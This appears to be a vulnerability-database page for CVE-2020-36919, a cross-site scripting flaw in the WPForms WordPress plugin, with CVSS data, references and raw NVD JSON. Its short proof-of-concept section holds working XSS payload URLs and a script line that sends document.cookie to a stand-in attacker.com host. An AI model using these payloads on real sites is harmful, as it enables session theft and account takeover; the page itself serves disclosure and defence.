CVE-2020-36919

Description

WPForms 1.7.8 contains a cross-site scripting vulnerability in the slider import search feature and tab parameter. Attackers can inject malicious scripts through the ListTable.php endpoint to execute arbitrary JavaScript in victim's browser.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:wpforms:wpforms:*:*:*:*:lite:wordpress:*:* - VULNERABLE

WPForms < 1.7.8

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2020-36919 XSS PoC -->
<!-- Target: WordPress site with WPForms < 1.7.8 -->

<!-- XSS via tab parameter in ListTable.php -->
https://target-site.com/wp-admin/admin.php?page=wpforms-builder&view=sliders&tab=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

<!-- XSS via slider import search feature -->
<!-- Inject payload in the search field -->
<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>

<!-- Example malicious URL for reference -->
<!-- http://vulnerable-site.com/wp-admin/admin.php?page=wpforms-builder&tab="><script>alert('XSS')</script> -->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2020-36919
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2020-36919
[3] CVE Details https://www.cvedetails.com/cve/CVE-2020-36919/
[4] VulDB https://vuldb.com/cve/CVE-2020-36919
[5] https://wordpress.org/plugins/wpforms-lite
[6] https://www.exploit-db.com/exploits/51152
[7] https://www.vulncheck.com/advisories/wpforms-cross-site-scripting-xss

Raw JSON Data

JSON

{"cve": {"id": "CVE-2020-36919", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:48.717", "lastModified": "2026-01-29T00:50:28.337", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WPForms 1.7.8 contains a cross-site scripting vulnerability in the slider import search feature and tab parameter. Attackers can inject malicious scripts through the ListTable.php endpoint to execute arbitrary JavaScript in victim's browser."}, {"lang": "es", "value": "WPForms 1.7.8 contiene una vulnerabilidad de cross-site scripting en la función de búsqueda de importación de deslizadores y el parámetro de pestaña. Los atacantes pueden inyectar scripts maliciosos a través del endpoint ListTable.php para ejecutar JavaScript arbitrario en el navegador de la víctima."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wpforms:wpforms:*:*:*:*:lite:wordpress:*:*", "versionEndIncluding": "1.7.8", "matchCriteriaId": "C2C0B222-34A9-40E4-89E3-937E76944165"}]}]}], "references": [{"url": "https://wordpress.org/plugins/wpforms-lite", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51152", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.vulncheck.com/advisories/wpforms-cross-site-scripting-xss", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}